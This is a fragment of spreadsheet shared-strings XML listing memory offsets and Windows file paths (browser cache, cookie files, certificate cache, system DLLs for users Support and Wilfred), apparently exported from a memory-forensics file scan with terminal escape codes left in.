  </si>
  <si>
    <t>0xdfcdff80</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DXJFQ9GW\B</t>
  </si>
  <si>
    <t>B1kc8s[1].png</t>
  </si>
  <si>
    <t>0xdfce05c8</t>
  </si>
  <si>
    <t>0xdfce11d8</t>
  </si>
  <si>
    <t>E43B18_88614F</t>
  </si>
  <si>
    <t>FAD35D35342</t>
  </si>
  <si>
    <t>1B8A7E</t>
  </si>
  <si>
    <t>1FE18FCE4_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfce1c98</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DXJFQ9GW\e</t>
  </si>
  <si>
    <t>151e5[1].gif_x001B_</t>
  </si>
  <si>
    <t>0xdfce20d0</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DXJFQ9GW\8</t>
  </si>
  <si>
    <t>9-6f6364-1763</t>
  </si>
  <si>
    <t>6285[1].css</t>
  </si>
  <si>
    <t>0xdfce23b8</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfce2470</t>
  </si>
  <si>
    <t>BUv7Sv[1].jpg</t>
  </si>
  <si>
    <t>0xdfce2658</t>
  </si>
  <si>
    <t>5-0f8009-68dd</t>
  </si>
  <si>
    <t>0xdfce2aa8</t>
  </si>
  <si>
    <t>0xdfce2bf0</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5IDSBAN9\j</t>
  </si>
  <si>
    <t>query-2.1.1.m</t>
  </si>
  <si>
    <t>in[1].js_x001B_[0</t>
  </si>
  <si>
    <t>0xdfce3038</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5IDSBAN9\t</t>
  </si>
  <si>
    <t>rk[1].js_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfce3118</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13</t>
  </si>
  <si>
    <t>E43B18_D9817B</t>
  </si>
  <si>
    <t>D5013875AD5</t>
  </si>
  <si>
    <t>17DA73</t>
  </si>
  <si>
    <t>475345203_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfce3228</t>
  </si>
  <si>
    <t>\Windows\System32\d3d10warp.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfce32e8</t>
  </si>
  <si>
    <t>0xdfce39c8</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Windows\Cookies\P049I32J.txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfce3ab0</t>
  </si>
  <si>
    <t>\Windows\System32\twext.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfce3f80</t>
  </si>
  <si>
    <t>0xdfce41b8</t>
  </si>
  <si>
    <t>\Program Files\Microsoft Silverlight\5.1.50918.0\npctrl.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfce45a8</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\739F2FF4259CDC6CBE7B90F1A9</t>
  </si>
  <si>
    <t>5601EF_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfce4a38</t>
  </si>
  <si>
    <t>\Windows\System32\DWrite.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfce4bb8</t>
  </si>
  <si>
    <t>43B18_D9817BD</t>
  </si>
  <si>
    <t>5013875AD51</t>
  </si>
  <si>
    <t>7DA734</t>
  </si>
  <si>
    <t>75345203_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfce4c98</t>
  </si>
  <si>
    <t>8F3328_6CBA2C</t>
  </si>
  <si>
    <t>06D5985DD95</t>
  </si>
  <si>
    <t>AE59AF</t>
  </si>
  <si>
    <t>8FC7C6220_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfce5c98</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6Y5MHK58\o</t>
  </si>
  <si>
    <t>sd[1].js_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfce7930</t>
  </si>
  <si>
    <t>\Windows\System32\Microsoft\Protect\S-1-5-18\Preferred_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfce7d58</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v2.0.50727\WMINet_Utils.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfce8400</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8C</t>
  </si>
  <si>
    <t>0xdfce8980</t>
  </si>
  <si>
    <t>0xdfce8a38</t>
  </si>
  <si>
    <t>\Windows\System32\jscript9.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfce8af0</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8</t>
  </si>
  <si>
    <t>0xdfcea038</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Windows\Cookies\4W5E2FGG.txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcea960</t>
  </si>
  <si>
    <t>0xdfceb038</t>
  </si>
  <si>
    <t>0xdfceb170</t>
  </si>
  <si>
    <t>0xdfceb388</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F12703B35B1F82C21160A92376</t>
  </si>
  <si>
    <t>087C84_D65FD7</t>
  </si>
  <si>
    <t>9591497596E</t>
  </si>
  <si>
    <t>D270B9</t>
  </si>
  <si>
    <t>0105A4D42_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcec548</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\Temporary Internet Files\Sqm\iesqmdata1.sqm_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcec8e0</t>
  </si>
  <si>
    <t>85AA5B_D4F01D</t>
  </si>
  <si>
    <t>341AC185E96</t>
  </si>
  <si>
    <t>A60D3B</t>
  </si>
  <si>
    <t>FDE3BA124_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfceca78</t>
  </si>
  <si>
    <t>0xdfcecbf8</t>
  </si>
  <si>
    <t>527E5F_1E2B4C</t>
  </si>
  <si>
    <t>0081D254DF1</t>
  </si>
  <si>
    <t>43CE0F02F_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfced978</t>
  </si>
  <si>
    <t>0xdfcedc58</t>
  </si>
  <si>
    <t>0xdfcedf80</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Windows PowerShell Mod</t>
  </si>
  <si>
    <t>ules.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcf6178</t>
  </si>
  <si>
    <t>0xdfcf6e20</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0LDUT682\M</t>
  </si>
  <si>
    <t>0[1].jpg_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcf73f8</t>
  </si>
  <si>
    <t>0xdfcf7700</t>
  </si>
  <si>
    <t>0010005.ci_x001B_[0</t>
  </si>
  <si>
    <t>0xdfcf7b30</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4344B8AF97AF3A423D9EE52899</t>
  </si>
  <si>
    <t>963CDE_D479FE</t>
  </si>
  <si>
    <t>E0A35640E88</t>
  </si>
  <si>
    <t>927A0BDD0_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcf8298</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\68FAF71AF355126BCA00CE2E73</t>
  </si>
  <si>
    <t>CC7374_77B682</t>
  </si>
  <si>
    <t>CF3AAC7B001</t>
  </si>
  <si>
    <t>61DFFF</t>
  </si>
  <si>
    <t>7DEA4CC8C_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcf8350</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\223DE96EE265046957A660ED7C9</t>
  </si>
  <si>
    <t>DD9E7_EFF9B9B</t>
  </si>
  <si>
    <t>A98DEAA773F</t>
  </si>
  <si>
    <t>261FA8</t>
  </si>
  <si>
    <t>5A0B1771_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcf8538</t>
  </si>
  <si>
    <t>43B18_88614FF</t>
  </si>
  <si>
    <t>AD35D353421</t>
  </si>
  <si>
    <t>B8A7E1</t>
  </si>
  <si>
    <t>FE18FCE4_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcf88f8</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7060BDD382843FF3503B836A6A</t>
  </si>
  <si>
    <t>50660B_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcf89b0</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DXJFQ9GW\A</t>
  </si>
  <si>
    <t>A2KH4D[1].png</t>
  </si>
  <si>
    <t>0xdfcf8b98</t>
  </si>
  <si>
    <t>BktLnF[1].png</t>
  </si>
  <si>
    <t>0xdfcf9038</t>
  </si>
  <si>
    <t>\Users\sshd_server\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.i</t>
  </si>
  <si>
    <t>0xdfcf92f8</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F4D9C889B7AEBCF4E1A2DAABC5</t>
  </si>
  <si>
    <t>C3628A_95DABC</t>
  </si>
  <si>
    <t>CE1CB97D54E</t>
  </si>
  <si>
    <t>8230DB</t>
  </si>
  <si>
    <t>CAEF692E5_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcf9418</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\895C3B2BFFAB7E70AD32F3CA87</t>
  </si>
  <si>
    <t>97DCB2_CC66DB</t>
  </si>
  <si>
    <t>497F4E0772B</t>
  </si>
  <si>
    <t>5BE3C7</t>
  </si>
  <si>
    <t>AEC433076_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcf9db0</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\15B86508F5AB147AE7FE339348</t>
  </si>
  <si>
    <t>3E81A8_91764B</t>
  </si>
  <si>
    <t>95DDFB32348</t>
  </si>
  <si>
    <t>E2D4B0</t>
  </si>
  <si>
    <t>532A61FB8_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcfa2a8</t>
  </si>
  <si>
    <t>B5w6z3[1].png</t>
  </si>
  <si>
    <t>0xdfcfa410</t>
  </si>
  <si>
    <t>BUvp8d[1].jpg</t>
  </si>
  <si>
    <t>0xdfcfa688</t>
  </si>
  <si>
    <t>0xdfcfaa50</t>
  </si>
  <si>
    <t>\Windows\System32\t2embed.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcfbcf0</t>
  </si>
  <si>
    <t>6A5282_A570B8</t>
  </si>
  <si>
    <t>98E66F0F02C</t>
  </si>
  <si>
    <t>948C5F</t>
  </si>
  <si>
    <t>9571B5AF7_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcfbf38</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Windows\Cookies\L2QY9Q2R.txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcfcc48</t>
  </si>
  <si>
    <t>0xdfcfcd00</t>
  </si>
  <si>
    <t>\Windows\System32\ieapfltr.dat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcfcf80</t>
  </si>
  <si>
    <t>0xdfcfd0f0</t>
  </si>
  <si>
    <t>\Windows\System32\C_20127.NLS_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcfd480</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\AntiPhishing\4A72F</t>
  </si>
  <si>
    <t>430-B40C-4D36</t>
  </si>
  <si>
    <t>DA5ADF</t>
  </si>
  <si>
    <t>9.dat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcff528</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\852CH0Q4\a</t>
  </si>
  <si>
    <t>d_status[1].j</t>
  </si>
  <si>
    <t>0xdfd01e10</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5IDSBAN9\B</t>
  </si>
  <si>
    <t>BTpd6B[1].jpg</t>
  </si>
  <si>
    <t>0xdfd01ec8</t>
  </si>
  <si>
    <t>BLq9Cp[1].jpg</t>
  </si>
  <si>
    <t>0xdfd01f80</t>
  </si>
  <si>
    <t>BUA8XN[1].jpg</t>
  </si>
  <si>
    <t>0xdfd02ae8</t>
  </si>
  <si>
    <t>0xdfd035a8</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1BB09BEEC155258835C193A7AA8</t>
  </si>
  <si>
    <t>5AA5B_ACE03BB</t>
  </si>
  <si>
    <t>44A62FE3F52</t>
  </si>
  <si>
    <t>B2D45D</t>
  </si>
  <si>
    <t>870897AD_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd03790</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB</t>
  </si>
  <si>
    <t>844250_5F5269</t>
  </si>
  <si>
    <t>AC0D922158A</t>
  </si>
  <si>
    <t>5B5420</t>
  </si>
  <si>
    <t>20448A2D3_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd03ba0</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DXJFQ9GW\s</t>
  </si>
  <si>
    <t>endspace[1].j</t>
  </si>
  <si>
    <t>0xdfd03c98</t>
  </si>
  <si>
    <t>BU8Qv8[1].jpg</t>
  </si>
  <si>
    <t>0xdfd04458</t>
  </si>
  <si>
    <t>0xdfd05208</t>
  </si>
  <si>
    <t>AzeoA7[1].png</t>
  </si>
  <si>
    <t>0xdfd052c0</t>
  </si>
  <si>
    <t>780281[1].jpg</t>
  </si>
  <si>
    <t>0xdfd054e0</t>
  </si>
  <si>
    <t>0xdfd05700</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A053CFB63FC8E6507871752236</t>
  </si>
  <si>
    <t>B5CCD5_1A6CE9</t>
  </si>
  <si>
    <t>AB5FEFD607A</t>
  </si>
  <si>
    <t>32104D</t>
  </si>
  <si>
    <t>7176ECC31_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd05920</t>
  </si>
  <si>
    <t>948338[1].jpg</t>
  </si>
  <si>
    <t>0xdfd05b40</t>
  </si>
  <si>
    <t>942804[1].jpg</t>
  </si>
  <si>
    <t>0xdfd05d60</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4CA77D36767B6202D4786BF3D1</t>
  </si>
  <si>
    <t>EC5242_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd05f80</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3ERB3PXY\b</t>
  </si>
  <si>
    <t>eacon[1].js_x001B_[</t>
  </si>
  <si>
    <t>0xdfd06728</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3ERB3PXY\M</t>
  </si>
  <si>
    <t>SNIdSync[1].j</t>
  </si>
  <si>
    <t>0xdfd067e0</t>
  </si>
  <si>
    <t>BMrBgh[1].jpg</t>
  </si>
  <si>
    <t>0xdfd06c10</t>
  </si>
  <si>
    <t>BUvUpF[1].jpg</t>
  </si>
  <si>
    <t>0xdfd06ce0</t>
  </si>
  <si>
    <t>0xdfd06eb8</t>
  </si>
  <si>
    <t>BUz83D[1].jpg</t>
  </si>
  <si>
    <t>0xdfd07038</t>
  </si>
  <si>
    <t>\Windows\System32\fdProxy.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd07940</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Windows\Cookies\MGQ1J8GG.txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd07c38</t>
  </si>
  <si>
    <t>\Ease of Acce</t>
  </si>
  <si>
    <t>ss.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd07cf0</t>
  </si>
  <si>
    <t>Ad5gIM[1].png</t>
  </si>
  <si>
    <t>0xdfd08038</t>
  </si>
  <si>
    <t>0xdfd08580</t>
  </si>
  <si>
    <t>E43B18_74167E</t>
  </si>
  <si>
    <t>25E5476CCA2</t>
  </si>
  <si>
    <t>A5946A</t>
  </si>
  <si>
    <t>AA61BF9E1_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd08638</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Internet Explorer\DOMStore\5AY2Z82O\widgets.outbrain[1]</t>
  </si>
  <si>
    <t>.xml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd08718</t>
  </si>
  <si>
    <t>0xdfd087d0</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E49827401028F7A0F97B5576C7</t>
  </si>
  <si>
    <t>0xdfd089f0</t>
  </si>
  <si>
    <t>0xdfd08f50</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Windows\Cookies\TCMMGB3C.txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd09038</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3ERB3PXY\l</t>
  </si>
  <si>
    <t>ogo[1].png_x001B_[0</t>
  </si>
  <si>
    <t>0xdfd09188</t>
  </si>
  <si>
    <t>\Windows\System32\mtxclu.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd09ec8</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2467130D2844BEC28A6B08564C</t>
  </si>
  <si>
    <t>E181D7_A7C7DD</t>
  </si>
  <si>
    <t>9037AF8FBB4</t>
  </si>
  <si>
    <t>8D3DAC</t>
  </si>
  <si>
    <t>A3A0FC268_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd09f80</t>
  </si>
  <si>
    <t>0xdfd0a358</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6Y5MHK58\s</t>
  </si>
  <si>
    <t>ilentpassport</t>
  </si>
  <si>
    <t>0xdfd0a598</t>
  </si>
  <si>
    <t>0xdfd0a958</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6B17EC2CD0C9B19353018FF1C1</t>
  </si>
  <si>
    <t>2BC489_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd0abd8</t>
  </si>
  <si>
    <t>0xdfd0af18</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\223DE96EE265046957A660ED7C</t>
  </si>
  <si>
    <t>85A0B1771_x001B_[0K_x001B_[45G</t>
  </si>
  <si>
    <t>0xdfd0b3b0</t>
  </si>
  <si>
    <t>D8DF7B_2D6AC2</t>
  </si>
  <si>
    <t>439C2E03B52</t>
  </si>
  <si>
    <t>10904F</t>
  </si>
  <si>
    <t>46911C544_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd0c0e8</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Caches\cversions.1.db_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd0c298</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Windows\Cookies\OF9T4ZYW.txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd0c358</t>
  </si>
  <si>
    <t>0xdfd0d170</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3ERB3PXY\c</t>
  </si>
  <si>
    <t>ss[1].css_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd0d270</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\68FAF71AF355126BCA00CE2E73</t>
  </si>
  <si>
    <t>0xdfd0d458</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1B1F4BA66CDBFEC85A20E11BF72</t>
  </si>
  <si>
    <t>9AF23_AA85F8F</t>
  </si>
  <si>
    <t>9DAFF33153B</t>
  </si>
  <si>
    <t>5AEC2E</t>
  </si>
  <si>
    <t>983B94B6_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd0d950</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1B1F4BA66CDBFEC85A20E11BF7</t>
  </si>
  <si>
    <t>0xdfd0dd38</t>
  </si>
  <si>
    <t>946320[1].jpg</t>
  </si>
  <si>
    <t>0xdfd0df80</t>
  </si>
  <si>
    <t>8CF53F_C293B3</t>
  </si>
  <si>
    <t>82A0716649B</t>
  </si>
  <si>
    <t>98CAD9</t>
  </si>
  <si>
    <t>52334A78B_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd0e940</t>
  </si>
  <si>
    <t>844250_3431D4</t>
  </si>
  <si>
    <t>C539FB2CFCB</t>
  </si>
  <si>
    <t>E9902850D_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd0eb28</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\68FAF71AF355126BCA00CE2E73C</t>
  </si>
  <si>
    <t>C7374_77B682C</t>
  </si>
  <si>
    <t>F3AAC7B0016</t>
  </si>
  <si>
    <t>1DFFF7</t>
  </si>
  <si>
    <t>DEA4CC8C_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd0ee58</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\69C6F6EC64E114822DF688DC12</t>
  </si>
  <si>
    <t>CDD86C_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd0fb40</t>
  </si>
  <si>
    <t>0xdfd0fbf8</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3ERB3PXY\f</t>
  </si>
  <si>
    <t>[1].txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd0ff08</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6A59C2B4529FA60196FE66A9AA</t>
  </si>
  <si>
    <t>54C0D5_99BBAA</t>
  </si>
  <si>
    <t>17018A39DF9</t>
  </si>
  <si>
    <t>0B54CD</t>
  </si>
  <si>
    <t>C82FF6E80_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd10368</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3ERB3PXY\w</t>
  </si>
  <si>
    <t>atch[1].js_x001B_[0</t>
  </si>
  <si>
    <t>0xdfd11298</t>
  </si>
  <si>
    <t>penid-en[1].j</t>
  </si>
  <si>
    <t>0xdfd11640</t>
  </si>
  <si>
    <t>\Windows\System32\EhStorAPI.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd11a10</t>
  </si>
  <si>
    <t>527E5F_024A4E</t>
  </si>
  <si>
    <t>59093B6DD31</t>
  </si>
  <si>
    <t>1299B4</t>
  </si>
  <si>
    <t>88AE42036_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd125f0</t>
  </si>
  <si>
    <t>\Windows\System32\davhlpr.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd12758</t>
  </si>
  <si>
    <t>0xdfd13868</t>
  </si>
  <si>
    <t>0xdfd13e28</t>
  </si>
  <si>
    <t>0xdfd13f00</t>
  </si>
  <si>
    <t>0xdfd14038</t>
  </si>
  <si>
    <t>0xdfd14240</t>
  </si>
  <si>
    <t>54C0D5_43E48E</t>
  </si>
  <si>
    <t>0B92A607AC2</t>
  </si>
  <si>
    <t>A5AB0D</t>
  </si>
  <si>
    <t>2C0220599_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd144f0</t>
  </si>
  <si>
    <t>43B18_C9FB72B</t>
  </si>
  <si>
    <t>5AE80778A08</t>
  </si>
  <si>
    <t>024D8B</t>
  </si>
  <si>
    <t>0FDECC6F_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd148d8</t>
  </si>
  <si>
    <t>E43B18_EE9DB8</t>
  </si>
  <si>
    <t>9C3D6A328B5</t>
  </si>
  <si>
    <t>FEAFF0</t>
  </si>
  <si>
    <t>ED3C77874_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd14b40</t>
  </si>
  <si>
    <t>0xdfd14bf8</t>
  </si>
  <si>
    <t>E43B18_C9FB72</t>
  </si>
  <si>
    <t>B5AE80778A0</t>
  </si>
  <si>
    <t>8024D8</t>
  </si>
  <si>
    <t>B0FDECC6F_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd15610</t>
  </si>
  <si>
    <t>0xdfd15c58</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6Y5MHK58\c</t>
  </si>
  <si>
    <t>a-pub-8929667</t>
  </si>
  <si>
    <t>634210480[1</t>
  </si>
  <si>
    <t>].js_x001B_[</t>
  </si>
  <si>
    <t>0xdfd16550</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9FD4CA697E5891F64DDE430D79</t>
  </si>
  <si>
    <t>EB74CD_10D313</t>
  </si>
  <si>
    <t>FB166A3CCDD</t>
  </si>
  <si>
    <t>FE22D1</t>
  </si>
  <si>
    <t>2AD5804EB_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd16738</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Windows\Cookies\VEB3ECGK.txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd169f0</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5IDSBAN9\z</t>
  </si>
  <si>
    <t>rt_lookup[1].</t>
  </si>
  <si>
    <t>0xdfd17038</t>
  </si>
  <si>
    <t>iAB0001.000_x001B_[</t>
  </si>
  <si>
    <t>0xdfd170f0</t>
  </si>
  <si>
    <t>0xdfd172b0</t>
  </si>
  <si>
    <t>0xdfd17388</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\37D958F0157C4E87D39A5E7FAB</t>
  </si>
  <si>
    <t>3AECCC_C35F1D</t>
  </si>
  <si>
    <t>A95A1D99E34</t>
  </si>
  <si>
    <t>1E052B</t>
  </si>
  <si>
    <t>698680A9B_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd179b8</t>
  </si>
  <si>
    <t>\Windows\System32\mshtml.tlb_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd17ba0</t>
  </si>
  <si>
    <t>0xdfd19038</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\59C48DAF0C5D8F8B7B9ABAA5A5</t>
  </si>
  <si>
    <t>5BD5E2_0F9D63</t>
  </si>
  <si>
    <t>17385B677A0</t>
  </si>
  <si>
    <t>BD5F3C</t>
  </si>
  <si>
    <t>9403D468D_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd19368</t>
  </si>
  <si>
    <t>0xdfd19420</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DXJFQ9GW\f</t>
  </si>
  <si>
    <t>0xdfd19a90</t>
  </si>
  <si>
    <t>\Users\Wilfred\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer0000000000000000000</t>
  </si>
  <si>
    <t>1.regtrans-ms</t>
  </si>
  <si>
    <t>0xdfd1bbd0</t>
  </si>
  <si>
    <t>6E1C7C_CBB16B</t>
  </si>
  <si>
    <t>7A61CE4E298</t>
  </si>
  <si>
    <t>730D3CE9B_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd1bcf0</t>
  </si>
  <si>
    <t>ookie_push[1]</t>
  </si>
  <si>
    <t>.htm_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd1c628</t>
  </si>
  <si>
